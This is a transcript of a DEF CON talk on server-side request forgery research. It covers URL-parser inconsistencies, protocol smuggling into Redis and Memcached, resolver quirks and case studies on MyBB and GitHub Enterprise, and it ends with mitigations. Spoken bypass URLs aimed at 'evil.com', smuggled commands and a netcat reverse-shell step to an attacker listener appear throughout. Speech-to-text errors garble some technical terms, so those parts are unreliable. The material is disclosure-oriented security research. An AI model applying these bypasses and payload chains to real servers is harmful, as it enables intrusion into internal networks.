>>Thanks for coming. This talk will be more about the research on web security. SSRF is an attack technique on web application. The first concept of SSRF was from 10 years ago. Since then, many exploitations and mitigations were developed. Sorry. In this talk I will show you some of my findings. These findings are not only able to bypass existing SSRF protections, but also lead to critical remote call executions. Also we will we will have we will give case studies in real world application, and a demo on GitHub Enterprise. Ok now if you feel like going to other talks, like Hacking Democracy or Open Source Safe Cracking Robots, this is your last chance. [audience laughs] Ok let’s go. Hi again, I’m Orange from Taiwan. Taiwan is a country in Asia, and we speak Mandarin Chinese. As you can see my English is not good. For this reason, I’ve prepared several notes for this talk. I will try my best to keep this talk. Thank you for bearing with me. I have just got my MS degree and work in a security startup. I can say that DEVCORE is the most professional red team in Taiwan. I’m a vulnerability researcher in DEVCORE. I can do reversing stuff, I know exploitation, but my favorite is still web security. [crowd member whoops] [speaker chuckles] Nice.[audience chuckles] I’m also a member of chrO.ot and HitCon. ChrO.ot is the earliest earliest hacker group in my country. In addition we host HitCon, the largest hacker conference in Taiwan. By the way, HitCon 2017 will take place on August 24 and 25. You’re welcome to join us. Here is a brief introduction of myself. I am a speaker, CTF player, and a bug bounty hunter. In web s- in web security I love server side vulnerability more than client side. To take control of a server is more fun for me. So I love remote code execution in particular. And you can see what vendors I report RCE to. Facebook, GitHub, Apple, Uber, and so on. Someone told me always put cats in your slides [audience laughs]. So that you can catch all the eyes and never fail, never fail your talk [audience chuckles] Nobody has cats, right? This is our agenda today. Our goal is to make SSRF great again. [audience laughs and cheers] First I will introduce SSRF and start with some quick fun examples. Next I will talk about my findings in both an attack surface in SSRF-bypass, and a new attack vector in protocol smuggling that enhances the existing SSRF. By combining this we can achieve more advanced exploitations or compromise the server. Of course we will have case studies and demo. What is SSRF? Ok Ok, I know this is Def Con, not SSRF 101 so I don’t need to talk about lots of trivial introductions. I suppose you all know what SSRF is. SS- SSRF in a word it can bypass the firewall and touch your intranet. So the attack surface is dependent on how big your intranet is. The larger your enterprise is, the more robust SSRF will be. For example, in a big company, there are lots of Struts2, Elastic, Redis, you can pawn by SSRF. Next, protocol smuggling in SSRF. It makes SSRF more powerful. There are several ways to smuggle protocols in your SSRF, and each way has it’s limitation. So, what protocol is good to smuggle? I have list here, and you can check. Okay our introduction part is over. Short, right? Before we start our topic. I want to make a survey. How many people use Python, please raise your hand. Wow. Ok. Def Con hasn’t come. [audience laughs] I want to ask you a question: if you want to access the web with Python, which library do you prefer? [unclear responses from audience] Eh nice- nice. I think that most Python guys use request based URLlib or URLlib2. Let’s start with a fun example. Think about this URL the red square is the space. So which address Python going to access? I’ll give you 5 seconds to put insert in your mind. 1, 2, 3, 4, 5, ok. Here’s the answer. [audience laughs] Actually even Python’s building libraries treat the same URL differently. URL lib access the blue part, and URLlib2 access the orange part, but green is requests-s. This sounds crazy. Python is really really hard. I don’t understand Python. [audience chuckles] Another showcase, it is easy to understand if there is a CRLF injection in HTTP and we can smuggle other protocols. But as you can see for the security console, most of SMTP servers breaks the HTTP connection. If server find the HTTP payton such er ge- slash, or post slash in the incoming request the server will cut off the connection. SMTP hates HTTP protocol and it seems unexploitable. Somebody might say “You can use Gopher.” We are not going to talk about Gopher today. Gopher is good but what if there, there is no Gopher support? Gopher is too easy, easy to break and not all not all programming languages support Gopher. But in a SSRF, the HTTP always exists. So we focus our attack scenario on the HTTP and HTTPS. Less smarter SMTP protocol over HTTPS. HTTPS is a secured protocol so the payload will be encrypted. So how? Let’s think about a question. What won’t be encrypted in a SSL handshake? Does anyone have an idea? Ok. The answer is SNI server name indication. We can send a HTTPS request and hope to defy to bypass the limitation. Smuggling SMTP over SSL SNI I think no one mentioned this before. During the SSL the hello messenger will be the handshake that exchange the metadata between the server and the client. And there is an SNI extension which specifies the remote host name in this messenger. So what if we can disrupt the hostname? Yes the yellow square. This space made it possible to embed Marshal’s payload in a domain name. So you can see with the space we can now inject new lines and data in the domain name. Okay why this works. We use a tree in Linux JULib C. And we we are introduce later. The data separated by newlines is SMTP protocol we smuggle. Our comment simply could cross the SMTP server to send the mail. This is the request and the response in parenthesis. You can see there is no HTTP payton here, but su- there is no HTTP payton slash er backslash or paused slash here. And a server recognize our payload as a valid comment. Uh Junk. [audience laughs and claps] So so we exploit the uh- we exploit the uh- [audience chuckles sympathetically] So we uh exploit the uh exploitable successfully. These 2 examples are interesting right? Ok let’s go to our main content. Yeah. Make SSRF great again. Today we’ve prepared 4 sections to make SSRF great again. First part URL parsing issues.This is all about inconsistency between the URL parser and the URL requester. It is common to fix an SSRF by validating the URL. But validating a URL is the hard work. Why? The spec of URL is defined in RFC3986 but only spec. with some implementation guidelines. WhatWG is a community trying to define a mode of implementation based on RFC. But in fact programming languages still prefer their own implementation mode. So there are lots of mistakes on URL parses. How RFC defines a URL. This is the URL components defined in RFC 3986. There are totally 5 parts, scheme, authority, path, query, and fragment. And this is what we will cover today. The scheme, authority, and path. For the scheme we only care about attack scenario under HTTP and HTTPS. For the authority and past, they are too complex to understand and we will take a look later. Finally, it’s the query and fragment. Umm I don’t care [audience chuckles]. This is the big picture of programs we will mention today. We classify the URL parsing issue into 3 types: port injection, host injection, and path injection. So does protocol smuggling. Smuggling on path, smuggling on host and the smuggling on SNI. Consider the following code in PHP. The code simply fetches the user provided URL. In order to prevent SSRF developers use the function parseURL to check whether the host and code are valid or not. So if you provide 127 dot 0 dot 0 dot 1, and port 81, you will- you will not pass the check. But how about this URL? Everyone knows colon is the separate between the host and the port. RFC defined the spec but didn’t say how to implement. So will the colon be interpreted from the front or the back? It is interesting for this URL the PHP function parse_URL recognized 80 as perl number. But actually PHP readfile fetches the perl number 11211. Both parse url and readfile are the building functions in PHP but their behaviors are very distinct. So we can use these inconsistencies to bypass the trend. And how about this URL. Google dotcom number sign at Evil dot com. This is another interesting test. Parse_url will recognize google dot com as host name. But the readfile fetches evil dot com. This URL perfectly bypassed all the restrictions. But are you curious about which behavior is the right one? Let’s make a little survey again. If you think google dot com is the right one, please raise your hand. Ok ok [chuckles] I think the domain evil dot com already told you the answer. Several programming languages suffered from this issue, like PHP, Java, cURL, and Python. According to the RFC, the authority uh the authority part is preceded by a double slash and is terminated by the next slash, question mark, or a number sign. So the appropriate authority part is google dot com. Ok if you don’t like PHP, let’s exploit cURL. cURL is a world famous library and there are lots of language bindings. Think about how cURL would appraise this URL. Foo at evil dot com point eighty at google dot com. Most parsers recognize google dot com as a valid host name. But cURL fetches evil dot com. The inconsistency between the parser and cURL will also lead to security problems. I think we all agree that cURL is the world famous library with lots of language bindings. Therefore if an application uses librar- parsing library to track the URL but fetched this resource by cURL it might be vulnerable. This is very common in PHP because PHP building HTTP library sucks [audience laughs] After I find this problem I quickly report to the cURL security team. And they p- patch this in no time. But while checking the patch, I find we can simply bypass the ch-the patch by an additional space.[audience laughs] This is not the fault of cURL this also use a feature in Linux Glibc and we will talk about later. However I think cURL can be more strict, so I report again but this time cURL team replied: “cURL doesn’t verify that the URL is 100 percent syntactically correct. It is instead documented to work with URLs and assumes that you pass correct input.” CURL thinks this is programmer’s problems so this won’t be fixed but previous patch still applied on cURL 7 dot 54. The next attack vector is about a Unicode failure and Node JS. Look at the following code. In order to prevent directory traversal the code check there is no dot dot in the path. So you can access the file outside of sandbox directory. The question is if there is a password file on the web root, how to access the file? Does anyone have an idea? Ok the SS is using a unicode symbol full width N. This url actually access the file password under web root. Ok let’s explain why. The java si- the javascript is internal process the Unicode string as encoding you see as 2. So the unicode symbol N will be presented in FF 2 E. And the trigger thing is the buffer string in HTTP module will fold back and the FF will be streamed. And the remaining part is 2E, the S-key of that. The server will identify the dot dot slash as the parent directory. So we can download the password file and the webroot from the remote server. The double full width N is the new dot dot slash in NodeJS HTTP module. What the hell? [audience laughs and claps] I have nothing to say. [audience laughs] This technique can be also applied on protocol smuggling. Originally HTTP module prevents users from CRLF error injection. The HTTP module will encode the new line as percent encoding. So if we inject new lines in the path, our smuggling will fail. But we can break the protections by Unicode symbol FF0D and FF0A. The full with dash and the full with asterisk. The HTTP module cannot locate any new lines in the past. But our code still fall back and strip the FF. So our protocol smuggling will be used again. Next section is about features on Linux Glibc. First this is a weird feature in an SS function gethostbyname. By looking at source of Glibc there is a comment here. Convert an ascii string into an into an encoded domain name as per RFC1035. But what is RFC1035? The RFC 1035 describes the details of the domain system and protocol. But the surprise is the domain system, suppose, suppose there’s no conversion in gethostbyname. You can see the C program the result of 0 R backslash 0 9 7 NGE dot TW is equal to the result of orange dot TW. I roughly correct the Linux mem patch but I didn’t find anything to dedicate to this weird feature. I think this may be useful when bypassing some blacklist protections. And the softcode showed that gethostbyname will remove the backslash that is not followed by digit. This is also a good way to obfuscate your domain name with lots of backslashes. You can see I printed out a host to show that the escaping process is done by gethostbyname. The next feature is about a Linux getaddressinfo. Getaddressinfo will strip trailing rubbish followed by a valid IP format and a whitespace. You can also see a C program the domain 127 dot 0 dot 0 dot 1 space FOO is valid and returns 127 dot 0 dot 0 dot 1. Getaddressinfo is a very fundamental function in Linux in Linux. For example the function gethostbyname in Python’s socket module relied on Linux get address info. So the CIO, CRNF FOO in the domain name will be removed. This makes it possible to do more compressed attacks best under polluted domain name. OK let’s talk about how to exploit NSS features on URL parsers. URL parsers might recognize all of the third part as hostname. But HTTP request still fetch 127 dot 0 dot 0 dot 1. The percent 25 09 is a special one and need more explanations. Why double encoding works. After digging the source, we find that libraries such as cURL decode the URL twice. So these paytons are useful when breaking some self domain checks. Next exploit NNS features and protocol smuggling. First, why this works. This is because that HTTP protocol 1 point 1 requires a host header. And most of libraries embed hostname into HTTP request. So the idea is if we can inject new lines in the host name, we have the ability to smuggle protocols in HTTP. For example the data with new lines in the host name will be recognized as the valid reader’s commit. You can see we smuggle the slave of command over the HTTP protocol. By the way the slave of is a nice command that you can make over traffics. This is useful, this is a useful trick when you are facing some blank SSRF. SNI injection is also the same idea. During the SSL, the SNI extension will embed hostname in the hello messenger. So if we inject new lines in the host name, we can find out the command in the encrypted message. Let’s break the patch of Python CVE 2016 5699. It’s the CRLF injection in the function put header of module HTTP lib. It also affects both URLLib and URLLib2 because they use HTT- HTTPLib to construct their HTTP requests. Python uses a regular equation to ensure there is no new lines in the header. Otherwise it will rest in error. But Python makes an an exception of the tap and space followed by the new line. So we can break the patch by deleting space. You can see with the space of the URLlib and URLlib2 are vulnerable again. But this brings out a new problem. There is one more leading space in our hello. Does protocols normally work this way? The answer is yes thanks to Redis and Memcached. As you can see, the slave of command starts with a leading space, but the server still reply OK. Redis and Memcached will strip the leading space so our exploit works again. Next attack vector is about IDNA standard. IDNA defines a standard of unicode in domain name system.There are 2 primary versions of IDNA. IDNA 2003 and 2008. But IDNA 2008 is too strict. So most of parsers followed IDNA 2003 with UTS 46 transition. The IDNA supposed lots of weird unicode transitions. For example the circled alphabet will be recognized as a valid letter in domain name system. And the unicode 2003 sealed with joiner will be removed in IDNA 2003 with UTS 46 transition. So if the parser and the requester adopt different IDNA standards, it might be a security problem. A very fun example is the latin letter small sharp S. This is a javascript example that you can run on your browser consoles. You can see the symbol in lowercase is a sign of itself but in uppercase it becomes a double capital S. And the redirection in process will go to wordpress dot com. This is useful when breaking some blacklist and we will give you a real case study later. OK cat studies. [audience laughs] This is not typo. C A T studies. Let’s study some real world cases. WordPress is a very famous web application and it had lot of attentions on SSRF. But we still find 3 different ways to bypass the protections. Bugs has been reported several months ago, but still aren’t patched. For the Responsible Disclosure Process, is Def Con heaven? [laughs] I will use MyBB as my case study instead. However these techniques are very general, so I think you can use them in anyway. This table shows the components, WordPress, VBulletin, and MyBB will use to trick a URL. The main concept of the bypass is finding different behaviors among the parser, DNS checker, and the requester. If you find one then you have the ability to bypass the restriction. OK this is the source of myBB. The first bypass is not a new trick. Eh it is time-of-check to time-of-use problem. MyBB uses parse URL to track whether the host name, scheme, and port are valid or not. And also use gethostbyname to resolve the domain ensuring that the address is not in blacklist. If the URL has order check myBB will fetch the resource by cURL. The problem is, the state-of-check and the state-of-use can be different. So we set up a DNS server and lay the first query to add our blacklist address, such as 1 dot 2 dot 3 dot 4. After we pass the check myBB will fetch the URL and query the domain again. In a moment we change it, we we change the DNS record to 127 dot 0 dot 0 dot 1. The state in check is 1 dot 2 dot 3 dot 4 but the state in use is 127 dot 0 dot 0 dot 1. So that we can bypass the protection. The next bypass is about the support of IDNA extender. cURL is a very intelligent library which can automatically convert a kernel domain name to an to an IP address. But PHP gethostbyname can’t. This inconsistency also leads to SSRF bypass. You can see for the URL gethostbyname will return false and as it should but cURL still fetches 127 dot 0 dot 0 dot 1. The last bypass is the inconsistency between the parser and the requester. We measured several URL parsing bugs before. By using these bugs, we can bypass all the restrictions. For the number sign bug the parse URL recognizes google dot com as host name, but cURL fetches 127 dot 0 dot 0 dot 1. This is handy but has been fixed in PHP 7 dot 0 dot 13. If you don’t like PHP, you can still exploit the bug in cURL. And the result is the same. This bug is also fixed in cURL 7 dot 54 but most of the patches didn't keep up. For example, the light cURL in the lighte- latt- latest version of Ubuntu is still 7 dot 52 dot 1. So I think most systems are still under threat. Or you can use the space technique we mentioned before. And this issue, cURL won’t fix. Ok let’s see our last case studies. GitHub Enterprise. GitHub Enterprise is a local version of GitHub that you can deploy the whole GitHub service in your private network. Most of the code are written in Ruby on Rails and obfuscated. The code base of GitHub Enterprise seems to be same as GitHub dot com, seems. And there is an environment- environment, whatever, that you can switch the mode from Enterprise to dot com version. If you want to study the security on GitHub I highly recommend GitHub Enterprise to you. [audience murmurs] In this case I will show you a beautiful exploitation that transformed vulnerabilities into a critical remote call execution. It also won the Best Report in GitHub 3rd Bug Bounty anniversary. Why are preying, why are preying on GitHub Enterprise? I know test there is an interesting feature called WebHook. WebHook can define a custom HTTP code back with specific, specific git commit occurs. GitHub used RubyGem Faraday to fetch external resource. And prevents and prevents users from SSRF by doing faraday restrict IP addresses. The gem seems to be just a blacklist, and can be bypassed by a zero. In Linux, the zero stands for local host. Ok we got SSRF now. However we still can’t do anything. Why? There are several limitations in this SSRF. Such as this SSRF only allow the scheme HTTP and HTTPS. And we can’t change the- change the scheme by the 302 redirection. This is also a POST best SSRF and we can’t even control the header or the POST data. The most important thing is there is no CRLF injection in this SSRF. We have an SSRF but with lots of limitations. My next I- my next idea is: is there any service we can liberate? It is a bit work. There are several service- services in sight. And each service plays on a different language implementation such as C, C plus plus, GOAL,and Tyson. With a couple days of digging, I find data service called Graphite on port 8 thousand. Graphite is a highly scaleable and real time sys- real time graphing system. Of course, we find another SSRF here. The second SSRF is simple. Graphite just fetched the URL, found the Get and run it. So we have 2 SSRFs now and we can combine these 2 SSRFs into an SSRF execution chain. The cool thing, right? And we’ve successful switched a POST best SSRF into a Get best SSRF. The 3rd bug is the CRLF injection in Graphite. As you can see, the implementation of the second SSRF is Python HTTPlib. Earlier we mentioned that HTTPlib suffered from CRLF injection. So with the CRLF injection we have the ability to smuggle protocols in this SSRF execution chain. However the next problem is: what protocol do I choose to smuggle? I spend lots of time to find out what vulnerabilities can be treated if I can control the Redis or Memcached. While reviewing the source, I am curious about, why GitHub can store Ruby objects? In Memcached? After some digging, I find GitHub used uh Ruby gem to store the cache. And the cache was ripped by Marshal. It is a good news. Everyone knows Marshal is dangerous. So our goal is clear. We use our SSRF execution trend to store Marshal's Ruby eh gem in Memcache. The next time GitHub fetches the cache the Ruby gem will deserialize the data automatically. And the result is we got a remote call execution. Here is the final payload. There are several parts. The the red part is the first SSRF bypass in webhook combined with the blue part, the second SSRF. The yellow is the memcached protocol we smuggled. And the final, that blue part is our malicious new reaction. In this case we eschew the commit ID hide NC orange W W hold 1 2 3 4 5. In this case I won 12,500 dollars from GitHub [audience applauds] Ok ok I have no time [chuckles]. I think this is a very critical case about SSRF execution chain and protocol smuggling in the world. Ok let’s watch the demo video- Remote Code Execution on GitHub Enterprise. OK this is GitHub Enterprise. Very similar to Github Ap- GitHub dot com right. Ok the version is 2 dot 8 dot 6. Eh? Oh yeah. In order to add a webhook we open our profile repositor- repository in the settings. Yeah. Click hooks and services and uhh add a webhook. OK here is the code back URL. We open our console. Echo hi. List our exploit file. And then load the er and load our exploit. Here is our SSRF payload. We pass the payload to the GitHub Enterprise. When we submit a file to SSRF execution trend, we are insert a malicious data to the memcached. OK we listen on port on 20 1 2 3 4 5 and wipe the commit back. The final step is to trigger the deserialization. We can search a keyword to trigger the RCE. [audience applauds] Ok ok ok, I have no time. [audience laughs] As you can see we got a shell. So with this SSRF execution chain and the protocol smuggling over the Memcached, we can execute arbitrary system commit on remote server. Mitigations. How to prevent such attacks in SSRF from 2 aspects. For application layer, use the only IP to connect, and remember don’t reuse the URL that user provided. For network layer use firewall or network policy to block intranet traffics. There are also projects that designed to prevent you from SSRF attacks. SafeCurl by Fin1te and Advocate by Jordan Milne. Ok we have no time. Thanks for friends back home, they inspired me to do this research. And thanks to many many people who helped me, Allen, Birdman, and Henry. This is the end of [audience applauds] my presentation. [audience cheers enthusiastically] OK OK. OK OK this is the end of my presentation. If you have further questions here here is my contact information. Orange at Chroot dot org, or you can find me on Twitter Orange underscore 8361. Thanks for staying with me. Thanks. [audience applauds]